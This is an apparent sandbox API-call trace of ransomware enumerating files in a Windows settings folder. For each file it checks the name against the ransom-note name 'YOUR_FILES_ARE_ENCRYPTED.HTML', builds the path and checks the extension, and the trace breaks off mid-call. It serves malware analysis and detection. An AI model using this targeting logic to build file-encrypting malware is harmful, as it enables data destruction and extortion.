FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x509d741, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x509d741, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b3, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_DefaultApps_Map.settingcontent-ms", cAlternateFileName="AA3906~1.SET")) returned 1 [0121.632] StrStrIW (lpFirst="AAA_SystemSettings_DefaultApps_Map.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.632] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Map.settingcontent-ms") returned 179 [0121.632] PathFindExtensionW (pszPath="AAA_SystemSettings_DefaultApps_Map.settingcontent-ms") returned=".settingcontent-ms" [0121.632] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.632] PathFindExtensionW (pszPath="AAA_SystemSettings_DefaultApps_Map.settingcontent-ms") returned=".settingcontent-ms" [0121.632] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51a8820, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x51a8820, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4c2, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms", cAlternateFileName="AA1CA4~1.SET")) returned 1 [0121.632] StrStrIW (lpFirst="AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.632] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms") returned 182 [0121.632] PathFindExtensionW (pszPath="AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms") returned=".settingcontent-ms" [0121.632] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.632] PathFindExtensionW (pszPath="AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms") returned=".settingcontent-ms" [0121.632] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f37d99, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5f37d99, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23884dd1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4bd, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_DefaultApps_Video.settingcontent-ms", cAlternateFileName="AA2D48~1.SET")) returned 1 [0121.632] StrStrIW (lpFirst="AAA_SystemSettings_DefaultApps_Video.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.632] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Video.settingcontent-ms") returned 181 [0121.632] PathFindExtensionW (pszPath="AAA_SystemSettings_DefaultApps_Video.settingcontent-ms") returned=".settingcontent-ms" [0121.632] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.632] PathFindExtensionW (pszPath="AAA_SystemSettings_DefaultApps_Video.settingcontent-ms") returned=".settingcontent-ms" [0121.632] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c4690c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c4690c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d1, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms", cAlternateFileName="AA3CE9~1.SET")) returned 1 [0121.632] StrStrIW (lpFirst="AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.632] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms") returned 187 [0121.632] PathFindExtensionW (pszPath="AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms") returned=".settingcontent-ms" [0121.632] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.632] PathFindExtensionW (pszPath="AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms") returned=".settingcontent-ms" [0121.632] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb19f230, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xb19f230, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d6, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms", cAlternateFileName="AA6E40~1.SET")) returned 1 [0121.632] StrStrIW (lpFirst="AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.632] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms") returned 188 [0121.633] PathFindExtensionW (pszPath="AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms") returned=".settingcontent-ms" [0121.633] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.633] PathFindExtensionW (pszPath="AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms") returned=".settingcontent-ms" [0121.633] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2aa39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xb2aa39d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4db, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms", cAlternateFileName="AA13AF~1.SET")) returned 1 [0121.633] StrStrIW (lpFirst="AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.633] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms") returned 189 [0121.633] PathFindExtensionW (pszPath="AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms") returned=".settingcontent-ms" [0121.633] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.633] PathFindExtensionW (pszPath="AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms") returned=".settingcontent-ms" [0121.633] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3b54f0, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xb3b54f0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4a1, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Device_Add.settingcontent-ms", cAlternateFileName="AA17AC~1.SET")) returned 1 [0121.633] StrStrIW (lpFirst="AAA_SystemSettings_Device_Add.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.633] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Device_Add.settingcontent-ms") returned 174 [0121.633] PathFindExtensionW (pszPath="AAA_SystemSettings_Device_Add.settingcontent-ms") returned=".settingcontent-ms" [0121.633] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.633] PathFindExtensionW (pszPath="AAA_SystemSettings_Device_Add.settingcontent-ms") returned=".settingcontent-ms" [0121.633] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4c04b8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xb4c04b8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ee, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms", cAlternateFileName="AA1EEC~1.SET")) returned 1 [0121.633] StrStrIW (lpFirst="AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.633] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms") returned 188 [0121.633] PathFindExtensionW (pszPath="AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms") returned=".settingcontent-ms" [0121.633] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.633] PathFindExtensionW (pszPath="AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms") returned=".settingcontent-ms" [0121.633] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5cb3ee, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xb5cb3ee, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d0, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Display_Brightness.settingcontent-ms", cAlternateFileName="AA73A3~1.SET")) returned 1 [0121.633] StrStrIW (lpFirst="AAA_SystemSettings_Display_Brightness.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.633] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Brightness.settingcontent-ms") returned 182 [0121.633] PathFindExtensionW (pszPath="AAA_SystemSettings_Display_Brightness.settingcontent-ms") returned=".settingcontent-ms" [0121.633] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.633] PathFindExtensionW (pszPath="AAA_SystemSettings_Display_Brightness.settingcontent-ms") returned=".settingcontent-ms" [0121.633] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6b0258, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xb6b0258, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4da, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Display_DPI_Override.settingcontent-ms", cAlternateFileName="AA923B~1.SET")) returned 1 [0121.633] StrStrIW (lpFirst="AAA_SystemSettings_Display_DPI_Override.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.633] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_DPI_Override.settingcontent-ms") returned 184 [0121.633] PathFindExtensionW (pszPath="AAA_SystemSettings_Display_DPI_Override.settingcontent-ms") returned=".settingcontent-ms" [0121.633] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.633] PathFindExtensionW (pszPath="AAA_SystemSettings_Display_DPI_Override.settingcontent-ms") returned=".settingcontent-ms" [0121.633] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7bb2f5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xb7bb2f5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4cb, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Display_Duplicate.settingcontent-ms", cAlternateFileName="AA3073~1.SET")) returned 1 [0121.633] StrStrIW (lpFirst="AAA_SystemSettings_Display_Duplicate.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.634] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Duplicate.settingcontent-ms") returned 181 [0121.634] PathFindExtensionW (pszPath="AAA_SystemSettings_Display_Duplicate.settingcontent-ms") returned=".settingcontent-ms" [0121.634] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.634] PathFindExtensionW (pszPath="AAA_SystemSettings_Display_Duplicate.settingcontent-ms") returned=".settingcontent-ms" [0121.634] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c6456, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xb8c6456, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50c, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms", cAlternateFileName="AA5F02~1.SET")) returned 1 [0121.634] StrStrIW (lpFirst="AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.634] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms") returned 194 [0121.634] PathFindExtensionW (pszPath="AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms") returned=".settingcontent-ms" [0121.634] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.634] PathFindExtensionW (pszPath="AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms") returned=".settingcontent-ms" [0121.634] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9d14cf, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xb9d14cf, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x511, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms", cAlternateFileName="AA9A18~1.SET")) returned 1 [0121.634] StrStrIW (lpFirst="AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.634] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms") returned 195 [0121.634] PathFindExtensionW (pszPath="AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.634] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.634] PathFindExtensionW (pszPath="AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.634] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b7ea2, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xc8b7ea2, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ee, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms", cAlternateFileName="AA6264~1.SET")) returned 1 [0121.634] StrStrIW (lpFirst="AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.634] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms") returned 188 [0121.634] PathFindExtensionW (pszPath="AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms") returned=".settingcontent-ms" [0121.634] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.634] PathFindExtensionW (pszPath="AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms") returned=".settingcontent-ms" [0121.634] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf59231c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xf59231c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d5, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Display_MainMonitor.settingcontent-ms", cAlternateFileName="AAF454~1.SET")) returned 1 [0121.634] StrStrIW (lpFirst="AAA_SystemSettings_Display_MainMonitor.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.634] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_MainMonitor.settingcontent-ms") returned 183 [0121.634] PathFindExtensionW (pszPath="AAA_SystemSettings_Display_MainMonitor.settingcontent-ms") returned=".settingcontent-ms" [0121.634] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.634] PathFindExtensionW (pszPath="AAA_SystemSettings_Display_MainMonitor.settingcontent-ms") returned=".settingcontent-ms" [0121.634] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12d73452, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x12d73452, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x233c02ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4c6, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Display_Monitors.settingcontent-ms", cAlternateFileName="AA5C91~1.SET")) returned 1 [0121.634] StrStrIW (lpFirst="AAA_SystemSettings_Display_Monitors.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.634] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Monitors.settingcontent-ms") returned 180 [0121.634] PathFindExtensionW (pszPath="AAA_SystemSettings_Display_Monitors.settingcontent-ms") returned=".settingcontent-ms" [0121.634] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.634] PathFindExtensionW (pszPath="AAA_SystemSettings_Display_Monitors.settingcontent-ms") returned=".settingcontent-ms" [0121.634] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12e7e4f6, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x12e7e4f6, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d5, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Display_Orientation.settingcontent-ms", cAlternateFileName="AA4ABA~1.SET")) returned 1 [0121.635] StrStrIW (lpFirst="AAA_SystemSettings_Display_Orientation.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.635] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Orientation.settingcontent-ms") returned 183 [0121.635] PathFindExtensionW (pszPath="AAA_SystemSettings_Display_Orientation.settingcontent-ms") returned=".settingcontent-ms" [0121.635] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.635] PathFindExtensionW (pszPath="AAA_SystemSettings_Display_Orientation.settingcontent-ms") returned=".settingcontent-ms" [0121.635] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12f634d2, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x12f634d2, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51b, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms", cAlternateFileName="AAC6EE~1.SET")) returned 1 [0121.635] StrStrIW (lpFirst="AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.635] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms") returned 198 [0121.635] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms") returned=".settingcontent-ms" [0121.635] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.635] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms") returned=".settingcontent-ms" [0121.635] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1304806c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1304806c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2391d733, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ee, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms", cAlternateFileName="AA706B~1.SET")) returned 1 [0121.636] StrStrIW (lpFirst="AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.636] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms") returned 189 [0121.636] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms") returned=".settingcontent-ms" [0121.636] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.636] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms") returned=".settingcontent-ms" [0121.636] FindNextFileW (in: 